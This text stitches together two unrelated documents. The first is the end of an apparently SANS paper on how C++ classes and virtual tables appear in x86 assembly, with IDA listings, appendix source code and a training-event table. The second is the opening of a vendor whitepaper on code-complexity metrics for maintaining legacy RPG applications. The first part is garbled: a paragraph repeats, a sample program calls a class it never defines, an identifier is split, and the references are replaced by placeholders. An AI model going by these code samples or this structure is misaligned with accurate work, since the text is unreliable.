the remaining offsets +4 and +8, respectively, are set here to two separate integers. This is known because the caller’s arguments, when pushed to the stack, were exposed as such in Figure 30. After considering the information thus far, one can define the following structure using IDA in Figure 31. ```assembly ; int __stdcall f_set_values(int int_1, int int_2) f_set_values proc near ptr_object= dword ptr -4 int_1= dword ptr 8 int_2= dword ptr 0Ch push ebp mov ebp, esp push ecx mov [ebp+ptr_object], ecx mov eax, [ebp+ptr_object] mov ecx, [ebp+int_1] mov [eax+4], ecx ; structure member set to int value mov edx, [ebp+ptr_object] mov eax, [ebp+int_2] mov [edx+8], eax ; structure member set to int value mov esp, ebp pop ebp ret 8 f_set_values endp ``` Figure 30: Assigning Class Member Variables At the assembly level, the virtual functions are called by referencing the object pointer for the class type and moving the first element of that class into a register that is later dereferenced and called into directly, like any other function. Interestingly, one can see from Figure 32 that the thiscall convention operation of moving the object to ECX is done separately from the task of setting up the EAX register for the eventual call into the virtual function. Figure 31: Structure Definition for Class Objects At the assembly level, the virtual functions are called by referencing the object pointer for the class type and moving the first element of that class into a register that is later dereferenced and called into directly, like any other function. Interestingly, one can see from Figure 32 that the thiscall convention operation of moving the object to ECX is done separately from the task of setting up the EAX register for the eventual call into the virtual function. By leveraging earlier analysis concerning how classes were being initialized, it should be clear to us precisely which one of the three virtual functions is chosen to be executed. Concerning the case from above, one can observe the initial offset of the structure to be pointing to the virtual function for the base class at `off_402154`. However, immediately following that, the same offset was overridden to be a pointer to `off_40215c`. Figure 33 shows the virtual table that contains the three functions. If any class has virtual methods, the compiler creates a sequence of pointer entries in a table to those methods (Skochinsky, 2011). Each of them are annotated to point out how they fit together, into the overall picture. ``` off_402154 dd offset virtual_base_class_function ; DATA XREF: f_initialize_base_class+8fo off_40215c dd offset unk_40228c off_402164 dd offset virtualDerived_class_function_1 ; DATA XREF: f_initializeDerived_class_1+12fo off_402170 dd offset unk_402270 off_402178 dd offset virtualDerived_class_function_2 ; DATA XREF: f_initializeDerived_class_2+12fo ``` Figure 33: Table of Pointer Entries to Virtual Functions Figure 34 steps into the sub routine of the base class. From within the base class, the object retrieved from the ‘this’ pointer is used to access member variables, perform some basic arithmetic, and return an integer. 3. Conclusion The outlined case studies illustrated common object oriented concepts with the intent of providing the reader with real examples encountered in reverse engineering C++. Reviewing calling conventions, inferring context of register contents based on assembly code, and following the flow of execution allows one to make informed observations on what a data structure or class ultimately represents. When these conclusions are applied to the broader project, it has an amplifying effect on the completeness of the reversing effort. Understanding the application of object oriented programming concepts, such as data structures, standard classes, and polymorphic classes, and how it is represented in x86 assembly, is an essential skill for the reverse engineer to meet today's challenges. While these concepts may be challenging for the uninitiated, the application of object oriented principles greatly simplifies the reversing process. When tasked to reverse engineer modern malware it is a mandatory skill to possess. Author Name, email@address 4. References Author Name, email@address 5. Appendix 5.1. Data Structures Source Code The following source code was used to create the example used in the first case study presented on data structures: ```c /* Jason Batchelor Reverse Engineering 04/13/2014 Rationale: Program for illustrating objects and structures. */ #pragma comment(lib,"wininet.lib") #include<iostream> #include<Windows.h> #include<wininet.h> #include<cstring> using namespace std; struct InternetConnection { HINTERNET Connect; HINTERNET OpenAddress; LPCTSTR Useragent; LPCTSTR Uri; char DataReceived[4096]; DWORD NumberOfBytesRead; DWORD TotalNumberRead; }; int GetHTML(InternetConnection &conn) { conn.TotalNumberRead = 0; conn.Useragent = "Mozilla/5.0 (Windows NT 5.1; rv:28.0) Gecko/20100101 Firefox/28.0 "; conn.Uri = "http://www.nhl.com"; conn.Connect = InternetOpen(conn.Useragent,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0); if(!conn.Connect){ printf("Connection Failed or Syntax error\n"); return 0; } conn.OpenAddress = InternetOpenUrl(conn.Connect, conn.Uri, NULL, 0, INTERNET_FLAG_P RAGMA_NOCACHE|INTERNET_FLAG_KEEP_CONNECTION, 0); if (!conn.OpenAddress ) ``` Author Name, email@address 5.2. Standard Classes Source Code The following code was used to compile the second presented case study on standard classes: ```c #include <iostream> using namespace std; class Square { int width, height; public: void set_values(int, int); int area() { return width*height; } }; void Square::set_values(int x, int y) { width = x; height = y; } ``` Author Name, email@address 5.3. Polymorphic Classes Source Code The following source code was used to illustrate the third case study on polymorphic classes, and their representation in x86: ```c++ /* Jason Batchelor Reverse Engineering 07/21/2015 Rationale: Program for illustrating virtual tables. */ #include <iostream> using namespace std; class Polygon { protected: int width, height; public: void set_values(int a, int b) { width = a; height = b; } virtual int magic() { return width + height; } }; class Rectangle: public Polygon { public: int magic() { return width * height; } }; class Triangle: public Polygon { public: int magic() { return (width - height); } }; int main () { Rectangle rect; Triangle trgl; Polygon poly; Square sq; sq.set_values(3,4); printf ("Area: %d", sq.area()); return 0; } ``` 5.4. Compiler Options All of the case study examples were compiled using the following settings. To produce a binary similar to what was reviewed in this paper, please ensure the settings below are applied. 5.4.1. Optimization Settings for Microsoft Visual Studio 2010 ![Optimization Settings for Microsoft Visual Studio 2010](image) 5.4.2. Compiler Flags ``` /Fp"Release\[project name].pch" /Fa"Release\" /Fo"Release\" /Fd"Release\vc100.pdb" /Gd /analyze- /errorReport:queue ``` Author Name, email@address ## Upcoming SANS Forensics Training <table> <thead> <tr> <th>Event</th> <th>Location</th> <th>Dates</th> <th>Format</th> </tr> </thead> <tbody> <tr> <td>SANS Cyber Security East: March 2021</td> <td></td> <td>Mar 01, 2021 - Mar 06, 2021</td> <td>CyberCon</td> </tr> <tr> <td>SANS Paris March 2021</td> <td>Virtual - Central European Time, France</td> <td>Mar 08, 2021 - Mar 13, 2021</td> <td>CyberCon</td> </tr> <tr> <td>SANS Secure Asia Pacific 2021</td> <td>Standard Time, Singapore</td> <td>Mar 08, 2021 - Mar 20, 2021</td> <td>CyberCon</td> </tr> <tr> <td>SANS Secure Asia Pacific 2021</td> <td>Singapore, Singapore</td> <td>Mar 08, 2021 - Mar 20, 2021</td> <td>Live Event</td> </tr> <tr> <td>Fort Gordon Cyber Protection Brigade (CPB/ARCYBER) (FOR500)</td> <td>Augusta, GA</td> <td>Mar 08, 2021 - Mar 13, 2021</td> <td>CyberCon</td> </tr> <tr> <td>SANS Gulf Region Spring 2021</td> <td>Virtual - Gulf Standard Time, United Arab Emirates</td> <td>Mar 13, 2021 - Mar 18, 2021</td> <td>CyberCon</td> </tr> <tr> <td>SANS Cyber Security West: March 2021</td> <td></td> <td>Mar 15, 2021 - Mar 20, 2021</td> <td>CyberCon</td> </tr> <tr> <td>SANS Riyadh March 2021</td> <td>Virtual - Gulf Standard Time, Kingdom Of Saudi Arabia</td> <td>Mar 20, 2021 - Apr 01, 2021</td> <td>CyberCon</td> </tr> <tr> <td>SANS Munich March 2021</td> <td>Virtual - Central European Time, Germany</td> <td>Mar 22, 2021 - Mar 27, 2021</td> <td>CyberCon</td> </tr> <tr> <td>SANS Secure Australia 2021</td> <td>Canberra, Australia</td> <td>Mar 22, 2021 - Mar 27, 2021</td> <td>Live Event</td> </tr> <tr> <td>SANS Secure Australia 2021 Live Online</td> <td>Virtual - Australian Eastern Daylight Time, Australia</td> <td>Mar 22, 2021 - Mar 27, 2021</td> <td>CyberCon</td> </tr> <tr> <td>SANS 2021</td> <td></td> <td>Mar 22, 2021 - Mar 27, 2021</td> <td>CyberCon</td> </tr> <tr> <td>SANS Cyber Security Mountain: April 2021</td> <td></td> <td>Apr 05, 2021 - Apr 10, 2021</td> <td>CyberCon</td> </tr> <tr> <td>USMC-MARFORCYBER / UKI - Live Online (FOR508)</td> <td>Columbia, MD</td> <td>Apr 05, 2021 - Apr 10, 2021</td> <td>CyberCon</td> </tr> <tr> <td>Fort Gordon Cyber Protection Brigade (CPB/ARCYBER) (FOR508)</td> <td>Augusta, GA</td> <td>Apr 12, 2021 - Apr 17, 2021</td> <td>CyberCon</td> </tr> <tr> <td>SANS Autumn Australia 2021 - Live Online</td> <td>Virtual - Australian Eastern Standard Time, Australia</td> <td>Apr 12, 2021 - Apr 17, 2021</td> <td>CyberCon</td> </tr> <tr> <td>USMC-MARFORCYBER / UKI - Live Online (FOR578)</td> <td>Columbia, MD</td> <td>Apr 12, 2021 - Apr 17, 2021</td> <td>CyberCon</td> </tr> <tr> <td>SANS London April 2021</td> <td>Virtual - British Summer Time, United Kingdom</td> <td>Apr 12, 2021 - Apr 17, 2021</td> <td>CyberCon</td> </tr> <tr> <td>SANS Cyber Security East: April 2021</td> <td></td> <td>Apr 12, 2021 - Apr 17, 2021</td> <td>CyberCon</td> </tr> <tr> <td>SANS Autumn Australia 2021</td> <td>Sydney, Australia</td> <td>Apr 12, 2021 - Apr 17, 2021</td> <td>Live Event</td> </tr> <tr> <td>SANS Secure India 2021</td> <td>Virtual - India Standard Time, India</td> <td>Apr 12, 2021 - Apr 17, 2021</td> <td>CyberCon</td> </tr> <tr> <td>SANS Stay Sharp: DFIR 2021</td> <td></td> <td>Apr 19, 2021 - Apr 24, 2021</td> <td>CyberCon</td> </tr> <tr> <td>Hurlburt DCO/H 21-04</td> <td>Hurlburt Field, FL</td> <td>Apr 19, 2021 - Apr 24, 2021</td> <td>CyberCon</td> </tr> <tr> <td>SANS Rocky Mountain Spring: Virtual Edition 2021</td> <td></td> <td>Apr 26, 2021 - May 01, 2021</td> <td>CyberCon</td> </tr> <tr> <td>SANS Baltimore Spring: Virtual Edition 2021</td> <td></td> <td>Apr 26, 2021 - May 01, 2021</td> <td>CyberCon</td> </tr> <tr> <td>SANS Brussels April 2021</td> <td>Virtual - Central European Summer Time, Belgium</td> <td>Apr 26, 2021 - May 01, 2021</td> <td>CyberCon</td> </tr> <tr> <td>SANS DFIRCON Spring 2021</td> <td></td> <td>May 03, 2021 - May 08, 2021</td> <td>CyberCon</td> </tr> <tr> <td>Fort Gordon Cyber Protection Brigade (CPB/ARCYBER)</td> <td>Augusta, GA</td> <td>May 03, 2021 - May 08, 2021</td> <td>CyberCon</td> </tr> <tr> <td>SANS Security West 2021</td> <td></td> <td>May 10, 2021 - May 15, 2021</td> <td>CyberCon</td> </tr> <tr> <td>SANS Amsterdam May 2021</td> <td>Virtual - Central European Summer Time, Belgium</td> <td>May 17, 2021 - May 22, 2021</td> <td>CyberCon</td> </tr> </tbody> </table>
{"Source-Url": "https://digital-forensics.sans.org/community/papers/grem/x86-representation-object-oriented-programming-concepts-reverse-engineers_3217", "len_cl100k_base": 11704, "olmocr-version": "0.1.49", "pdf-total-pages": 33, "total-fallback-pages": 0, "total-input-tokens": 75560, "total-output-tokens": 14156, "length": "2e13", "weborganizer": {"__label__adult": 0.0004148483276367187, "__label__art_design": 0.00034737586975097656, "__label__crime_law": 0.0013523101806640625, "__label__education_jobs": 0.0009717941284179688, "__label__entertainment": 6.74128532409668e-05, "__label__fashion_beauty": 0.0001691579818725586, "__label__finance_business": 0.0001931190490722656, "__label__food_dining": 0.0003056526184082031, "__label__games": 0.000759124755859375, "__label__hardware": 0.0015039443969726562, "__label__health": 0.00037980079650878906, "__label__history": 0.00022494792938232425, "__label__home_hobbies": 9.92417335510254e-05, "__label__industrial": 0.0005192756652832031, "__label__literature": 0.0002071857452392578, "__label__politics": 0.0002422332763671875, "__label__religion": 0.00038313865661621094, "__label__science_tech": 0.0231170654296875, "__label__social_life": 8.255243301391602e-05, "__label__software": 0.0074615478515625, "__label__software_dev": 0.96044921875, "__label__sports_fitness": 0.00023066997528076172, "__label__transportation": 0.00046896934509277344, "__label__travel": 0.000152587890625}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 51377, 0.04421]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 51377, 0.68304]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 51377, 0.86152]], "google_gemma-3-12b-it_contains_pii": [[0, 338, false], [338, 1602, null], [1602, 3810, null], [3810, 7271, null], [7271, 8390, null], [8390, 10342, null], [10342, 11642, null], [11642, 12375, null], [12375, 14562, null], [14562, 16441, null], [16441, 17942, null], [17942, 19340, null], [19340, 20502, null], [20502, 22035, null], [22035, 23444, null], [23444, 25129, null], [25129, 26303, null], [26303, 28282, null], [28282, 30238, null], [30238, 31557, null], [31557, 33267, null], [33267, 34803, null], [34803, 36028, null], [36028, 37629, null], [37629, 39007, null], [39007, 40069, null], [40069, 41956, null], [41956, 43095, null], [43095, 44307, null], [44307, 44712, null], [44712, 45729, null], [45729, 46343, null], [46343, 51377, null]], "google_gemma-3-12b-it_is_public_document": [[0, 338, true], [338, 1602, null], [1602, 3810, null], [3810, 7271, null], [7271, 8390, null], [8390, 10342, null], [10342, 11642, null], [11642, 12375, null], [12375, 14562, null], [14562, 16441, null], [16441, 17942, null], [17942, 19340, null], [19340, 20502, null], [20502, 22035, null], [22035, 23444, null], [23444, 25129, null], [25129, 26303, null], [26303, 28282, null], [28282, 30238, null], [30238, 31557, null], [31557, 33267, null], [33267, 34803, null], [34803, 36028, null], [36028, 37629, null], [37629, 39007, null], [39007, 40069, null], [40069, 41956, null], [41956, 43095, null], [43095, 44307, null], [44307, 44712, null], [44712, 45729, null], [45729, 46343, null], [46343, 51377, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 51377, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 51377, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 51377, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 51377, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 51377, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 51377, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 51377, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 51377, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 51377, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 51377, null]], "pdf_page_numbers": [[0, 338, 1], [338, 1602, 2], [1602, 3810, 3], [3810, 7271, 4], [7271, 8390, 5], [8390, 10342, 6], [10342, 11642, 7], [11642, 12375, 8], [12375, 14562, 9], [14562, 16441, 10], [16441, 17942, 11], [17942, 19340, 12], [19340, 20502, 13], [20502, 22035, 14], [22035, 23444, 15], [23444, 25129, 16], [25129, 26303, 17], [26303, 28282, 18], [28282, 30238, 19], [30238, 31557, 20], [31557, 33267, 21], [33267, 34803, 22], [34803, 36028, 23], [36028, 37629, 24], [37629, 39007, 25], [39007, 40069, 26], [40069, 41956, 27], [41956, 43095, 28], [43095, 44307, 29], [44307, 44712, 30], [44712, 45729, 31], [45729, 46343, 32], [46343, 51377, 33]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 51377, 0.11695]]}
olmocr_science_pdfs
2024-11-24
2024-11-24
04bd6d668f66854e774b5a4fc40faa2eca0d0bc7
Complexity Metrics and Difference Analysis for better Application Management # Table of Contents Executive Summary Concepts The Science Behind Software Maintenance Why Audit and Metric Capabilities are Critical for Managing Legacy Applications Overview Aspects of Quality in Software Maintenance Translating Quality Into Measurable Items How Measurable Items Become Actionable Uses of Historical and Time Series Information Version Comparison Testability Use Cases for Metrics Reporting and Difference Analysis Find the Most Complex Code in My System Reducing Size of Application and Maintenance Workload by Removing unnecessary Code Improving Project Management through Better Information Cleaning Up your System to Recompile in its Entirety Targeting Top 1% of Code that makes your JOB Difficult Finding Programs most likely to Produce Defects when Modified Identifying Unseen Risk in your Application Monitoring Changes in Program Complexity to preserve System Value & Extend its life Analyzing Metrics Time Series Data for Changes in System Complexity Analyzing Differences in Source Code and System Objects in different Versions The most challenging task in IT programming is maintaining and enhancing existing applications. This in fact represents the majority of worldwide programming budgets. Unlike new software development, maintenance work is significantly impacted by characteristics of the software being modified. Modifying existing code can be exceptionally difficult and prone to cost overruns, delays and defects. This paper discusses how you can improve your maintenance results by gaining quantifiable, measurable insights into your existing application. You can get significant information for these kinds of questions: - How difficult will it be to modify this program? - This program is very complex to modify, should we look for an alternative design? - How difficult will it be to test this program if we modify it? - Where are there risks that my programmers are not seeing? - Do my programmers’ estimates line up with the complexity of the programs? - Is this program too complex to give to a junior programmer? - The system is becoming more and more complicated, what’s the best approach to simplifying it? Where do we start? Many System i applications exceed a million lines of code. Over the span of their lifetime the systems become more and more complex, seriously, and adversely, impacting IT software projects and business objectives. This paper discusses how to measure that complexity so you can act on it to lower your costs, increase your throughput and improve your quality. “You cannot manage what you do not measure.” - Bill Hewlett, Hewlett-Packard The ISO Software Quality Model defined in 1996 under 9126 and updated in 2005 under 2500n defines the means to measure the quality of a software application with six main quality characteristics: - Functionality - Reliability - Usability - Efficiency - Maintainability - Portability Of particular importance to managers of legacy applications is that section called "Maintainability" which can be broadly defined as the ability to make changes for improving functionality, improving performance, meeting compliance requirements or fixing defects. The Model defines four characteristics that describe in more detail how maintainable a software system is: - Maintainability - Analyzability – the ability to locate and scope features or faults within the code - Changeability – the effort required to make changes to the software - Stability – the likelihood that changes to the software will result in defects - Testability – the effort required to test changes to the software Independently of project specifics, these characteristics of the software work in concert with programmers' skills and their tools to determine how well the IT organization performs its role of supporting and enhancing applications. The primary factors in the success or failure of software maintenance tasks are the programmers’ skills, tools and the traits of the software being maintained. **The Human Factor** - “It is harder to read a program than write it.” This familiar-sounding adage also sounds suspiciously like folk wisdom, but in fact there is serious science behind it. For nearly 20 years the *IEEE International Conference on Program Comprehension* has been meeting to research and discuss the challenges of maintaining software applications. Two of the key topics in this subject area are: - The mental processes people use to understand software - The characteristics of software that make it easy or difficult to understand The ISO Software Quality Model described above addresses the second of those points by stating that critical aspects of software quality are its analyzability, changeability, stability and testability. While all of these characteristics ultimately involve mental processes of people, they also lead to the hope that they that can be measured in themselves and thus, fit into a quality management program, which in turn should lead to increased productivity, programming throughput and higher quality. How then, can one measure analyzability? There is no doubt that there are certain programs that, upon a little examination, lead one to quickly say, “This is very complicated. I do not want to maintain this program!” An experienced programmer may look at a program and come to that conclusion in less than 60 seconds. *How does a programmer quickly assess the analyzability of a program?* That programmer is making a quick judgment on how much effort is required to build mental models of control flow and data flow sufficiently complete and accurate to make software changes with an appropriate degree of confidence. **What did the programmer look at to make that judgment?** The Software Factor - Over the past four decades a number of formulas and models have been developed that attempt to measure the complexity of software by analyzing the source code. If these measurements are successful then it they will give us a good understanding of all those maintainability characteristics. **What do these complexity models measure?** Essentially they measure the things that are used in the mental processes and tasks of a programmer who is trying to understand a program: - Build a mental model of the control flow of the program; i.e., the sequence of events and their conditioning. - Build a mental model of the data flow of the program; i.e., what data goes in, how it’s transformed, and what goes out. - Map real world actions to actions observed in the code; e.g., “this is where we give a discount to frequent customers”. - Engage in “feature location”, whereby the programmer is trying to find the code that implements features that are relevant to the modification task. - Create and test out code modification hypotheses; i.e., “design” and “impact analysis”. - Utilize “beacons” to do all of the above; i.e., scan code and comments for keywords that signify relevance; e.g., a subroutine named WRITExxx probably outputs some data. - Utilize “chunking” to gradually aggregate understanding of small pieces of code into large and larger pieces. Some of these processes are more measurable than others: **Control Flow** – the actual control flow of a program is determined by the control operations such as IF, DO, ELSE, etc., as well as the sequence of statements. If we can measure the number and complexity of control flow statements, plus the overall number of statements we can gain some insight into how challenging the task is to learn a given program for the purpose of modifying it. **Data Flow** – the data flow of a program is determined by files that are input, fields that are transformed and files that are output. If we can measure the number and complexity of such fields we can gain some insight into how challenging the task is to learn a given program for the purpose of modifying it. **Map real world actions, feature location and beacons** – you may wonder how an earth these things could be measured, but in fact there are some indicators we can use. Researchers have shown many times that well placed, well written comments and informatively named program tokens can greatly improve program comprehension. **Complexity Metrics & Difference Analysis for better Application Management** **Chunking** – Code that is well organized and structured into loosely coupled, cohesive, visually distinct blocks is easier to mentally aggregate and comprehend than piles of spaghetti code. Databorough’s X-Audit tool provides metrics for many of these characteristics as this paper describes in detail. --- **Why Audit and Metric Capabilities are Critical for Managing Legacy Applications** **Consider these two facts:** - 75% of worldwide IT programming budgets are dedicated to maintaining an enhancing existing software applications (Forrester Group) - 40-60% of maintenance programmers’ time is spent simply trying to understand the code they are working on (Software Engineering Book of Knowledge) If you put those two facts together you come to the conclusion that the single most expensive task in all of IT programming is programmers trying to understand code. **What are the impacts on IT and businesses of this maintenance challenge?** - **Costs are high:** it is more expensive to deliver a given amount of functionality to the business if it must be part of an existing application than if it is a new application - **Expenses diverted to the old rather than the new:** the bulk of IT programming budgets go to maintaining existing applications rather than developing new applications that could more quickly provide competitive advantages - **Business opportunities missed:** new business opportunities are missed or delayed because IT cannot respond quickly or cost-effectively enough to enhance existing systems to support new business opportunities - **Operational and financial risks:** changing highly complex, existing systems can introduce production defects that pose operational or financial risks - ** Threat of non-compliance:** the business risks not meeting regulatory requirements in a timely manner if systems cannot be enhanced quickly enough **Why is it difficult to understand existing code?** At a very basic level there are two things involved, the programmer and the code. Programmers may be under-equipped, for whatever reason, to do the job, and that makes it difficult for them. Or, the code is in fact very complicated, and somewhat defiant of human comprehension. What can be done to improve maintenance value delivery? In his book examining over 12,000 software projects and their critical success and failure factors, *Applied Software Measurement: Global Analysis of Productivity and Quality*, long-time software metrics guru Capers Jones provides some insightful numbers from his analysis of maintenance productivity and quality. The following table shows factors that positively impact maintenance productivity, and factors that negatively impact maintenance productivity. <table> <thead> <tr> <th>Positive Factors</th> <th>Impact%</th> <th>Negative Factors</th> <th>Impact%</th> </tr> </thead> <tbody> <tr> <td>Staff are maintenance specialists</td> <td>+35</td> <td>Error-prone code</td> <td>-50</td> </tr> <tr> <td>High staff application experience</td> <td>+34</td> <td>Embedded variables, data</td> <td>-45</td> </tr> <tr> <td>Table driven variables</td> <td>+33</td> <td>Low staff experience</td> <td>-40</td> </tr> <tr> <td>Low complexity code</td> <td>+32</td> <td>High complexity code</td> <td>-30</td> </tr> <tr> <td>Static analysis tools</td> <td>+30</td> <td>No static analysis tools</td> <td>-28</td> </tr> <tr> <td>Code Re-factoring tools</td> <td>+29</td> <td>Manual change control</td> <td>-27</td> </tr> <tr> <td>Complexity analysis tools</td> <td>+20</td> <td>No defect tracking tools</td> <td>-22</td> </tr> <tr> <td>Automated change control</td> <td>+18</td> <td>No quality measurements</td> <td>-18</td> </tr> <tr> <td>Quality measurements</td> <td>+16</td> <td>Management inexperience</td> <td>-15</td> </tr> <tr> <td>Formal code inspections</td> <td>+15</td> <td>No code inspections</td> <td>-15</td> </tr> <tr> <td>Regression test libraries</td> <td>+15</td> <td>No annual training</td> <td>-10</td> </tr> </tbody> </table> Like many such analysis, some of the good and bad factors are just the flip side of each other, but here is what stands out and should be heeded by the thoughtful IT manager: The dominant factors that affect maintenance productivity, costs and quality, both good and bad, are related to the complexity and quality of the code, and the tools available to deal with them. Here is another view of that table highlighting the relevant factors, and the solutions that Databorough delivers to directly address those factors. <table> <thead> <tr> <th>Positive Factors</th> <th>Impact%</th> <th>Negative Factors</th> <th>Impact%</th> </tr> </thead> <tbody> <tr> <td>Maintenance specialists</td> <td>+35</td> <td>Error-prone code (X-Audit)</td> <td>-50</td> </tr> <tr> <td>High staff experience</td> <td>+34</td> <td>Embedded variables (X-Analysis)</td> <td>-45</td> </tr> <tr> <td>Table driven variables (X-Analysis)</td> <td>+33</td> <td>Low staff experience</td> <td>-40</td> </tr> <tr> <td>Low complexity code (X-Audit)</td> <td>+32</td> <td>High complexity code (X-Audit)</td> <td>-30</td> </tr> <tr> <td>Static analysis tools (X-Analysis)</td> <td>+30</td> <td>No static analysis tools (X-Analysis)</td> <td>-28</td> </tr> <tr> <td>Code Re-factoring tools (X-Redo)</td> <td>+29</td> <td>Manual change control</td> <td>-27</td> </tr> <tr> <td>Complexity analysis tools (X-Redo)</td> <td>+20</td> <td>No defect tracking tools</td> <td>-22</td> </tr> <tr> <td>Automated change control</td> <td>+18</td> <td>No quality measurements</td> <td>-18</td> </tr> <tr> <td>Quality measurements</td> <td>+16</td> <td>Management inexperience</td> <td>-15</td> </tr> <tr> <td>Formal code inspections</td> <td>+15</td> <td>No code inspections</td> <td>-15</td> </tr> <tr> <td>Regression test libraries</td> <td>+15</td> <td>No annual training</td> <td>-10</td> </tr> </tbody> </table> How can you start achieving these kinds of gains in productivity and quality? Very simply, you need better information for management and better information for programming. Databorough supplies two essential tools to improve productivity and quality for maintenance operations that directly address the above statistics as found in over 12,000 software projects: **X-Analysis** – An application cross reference and static analysis tool that enables managers, systems analysts and programmers to rapidly and thoroughly research existing applications in support of application enhancement, debugging and documentation tasks. **X-Audit** – The focus of this paper - is a source code and object analysis system that provides metrics, alerts and time series comparisons of the state of your application to enable you to focus attention on the areas of your system most in need of correction, improvement or attention. With this information available you can begin to answer some truly important questions: - How can I find the most complex code in my applications? - Can I reduce the size of my applications, and thereby the maintenance workload, by removing unnecessary code? - How can I improving my project management, estimating, scheduling, budgeting, testing, etc., through the use of this information? - How can I clean up my applications so they will recompile in their entirety? - Is there a way to target the top 1% of my code that makes our job the most difficult? See the sections on Popular Use Cases for more examples and detailed information. Overview Aspects of Quality in Software Maintenance As the earlier section, The Science Behind software Maintenance, describes, the ISO Software Quality Model breaks down software quality into six characteristics, one of which we are most concerned with as managers of legacy systems (shown here broken down further): - Functionality - Reliability - Usability - Efficiency - Maintainability - Analyzability – the ability to locate and scope features or faults within the code - Changeability – the effort required to make changes to the software - Stability – the likelihood that changes to the software will result in defects - Testability – the effort required to test changes to the software - Portability In this paper we are specifically concerned with software maintenance and how we can obtain useful quality information by analyzing source code and other system information. And even more specifically, we are concerned with how we can quantify that information by casting it into a framework of metrics. But let’s first look in another direction and think about another set of ISO standards, those that pertain to Software Maintenance. ISO 14764, Software Life Cycle Processes for Maintenance describes four categories of maintenance activities: - Corrective – fix defects - Adaptive – modify the software to keep it useful i.e. enhancements - Perfective – improve either the performance or maintainability of the software - Preventive – preemptively detect or correct latent defects in the software Various studies have shown that upwards of 80% of total activity is adaptive, in other words, enhancements to the system. There is sometimes a view that most of the work is corrective, but it has also been shown that many tasks presented by users as bug fixes are in fact requests for changes in functionality. Many maintenance organizations do not fully distinguish between corrective and adaptive activities and often switch staff freely between these types of tasks. Key Principal: All Software Quality Declines Over Time However the work is categorized and managed, over time, the quality of the software goes down. In fact, unless actions are taken to correct it, it is completely unavoidable that the quality of the software goes down over time: - If the software is maintained without full regard to maintainability it will necessarily become more complex, and thus its maintainability quality will decline, or - If the software is not maintained it will necessarily become less useful to the evolving user organization, and thus its functionality quality will diminish The Inevitability of Decline The evolution of software systems over time has been studied by a number of researchers and academics. Professor Meir Lehman of Imperial College London identified a number of observations of how software evolves over time in what is often called The Eight Laws Of Software Evolution. For the IT manager with a big picture of the forces at work in software maintenance it is worth having some awareness of these forces: 1. Continuing change – software must be continually adapted or it will become less and less satisfactory 2. Increasing complexity – as software is changed it becomes increasingly complex unless work is done to mitigate the complexity 3. Relationship to organization – the software exists within a framework of people, management, rules and goals which create a system of checks and balances which shape software evolution 4. Invariant work rate – over the lifetime of a system the amount of work performed on it is essentially the same as external factors beyond anyone’s control drive the evolution 5. Conservation of familiarity – developers and users of the software must maintain mastery of its content in order to use and evolve it; excessive growth reduces mastery and acts as a brake. 6. Continuing growth – seemingly similar to the first law, this observation states that additional growth is also driven by the resource constraints that restricted the original scope of the system. 7. Declining quality – the quality of the software will decline unless steps are taken to keep it in accord with operational changes. 8. Feedback system – the evolution in functionality and complexity of software is governed by a multi-loop, multilevel, multiparty feedback system. Why is this important, or how is it useful? The job of most IT managers is typically to get it done faster, better, cheaper. ("pick two," as the saying goes) Often unstated is the further directive to continually improve in those measurements. Not just today, but next year, and the year after. But implicit in all of the above is that much of what you do today will slow you down tomorrow. Unless, that is, you take action on the implicit advice of the second law and do work to maintain your system’s maintainability. And indeed, many IT organizations with a long view of the life of their software and its responsiveness to business needs take proactive steps to maintain maintainability and manage to maintainability. But how is that possible? How do you undertake a program of maintaining maintainability and managing to maintainability? For that, we return to the wisdom of Bill Hewlett: “You cannot manage what you do not measure.” Translating Quality Into Measurable Items Again, this paper concerns itself with what aspects of quality that can be measured by analyzing source code and other system information. What aspects of quality cannot be measured this way? We cannot, for example, measure how well the system functionality meets business needs, since we have no way in the system to measure business needs. We can also do very little to measure system reliability – though we could perhaps measure system availability, measuring defects calls for a tool designed for that purpose. What can we measure by looking at the source code and system objects? As mentioned earlier, there are some key mental processes that programmers engage in when performing maintenance. If we can measure things that relate to these processes we will get some understanding of the level of maintainability quality: **Control Flow** – what conditions control the program’s operations and what is their sequence? **Data Flow** – what are the files and fields that are input, how are they transformed, how are they output? **Map real world actions, feature location and beacons** – what is the quality of names assigned to program tokens and the level of commenting? **Chunking** – to what degree is the code loosely coupled and cohesive and readable? If these are the mental processes that impact maintainability, what be measured for them? Looking at this in strictly RPG terms we can define a number of aspects of the source code that can help us measure these characteristics: **RPG Metrics that indicate comprehensibility of Control Flow** - Cyclomatic complexity – basically a count of Ifs, Dos, FORs, WHENs, etc. - Greatest depth of nested ELSEs. - Number of GOTOs or CABxxs. - Greatest depth of nested IF/ Dos. - Greatest number of statements in an IF/DO block. - Greatest depth of loops within loops. - Greatest number of statements in a subroutine. - Depth of subroutine calls. - Uses RPG Cycle for processing. - Number of statements with conditioning indicators. - Decision density. - Number of delocalizing statements. **RPG Metrics that indicate comprehensibility of Data Flow** - Halstead volume – basically a measure of the number of distinct fields and their uses - Number of database files - Number of device files - Number of EXFMTs/ READs to display files - Number of display file formats with fields that output to a database file - Number of sub-files in program - Number of called programs Complexity Metrics & Difference Analysis for better Application Management - Number of calling programs - Number of fields whose value was set - Number of fields whose value was used - Number of global fields whose value was set - Number of global fields whose value was used - 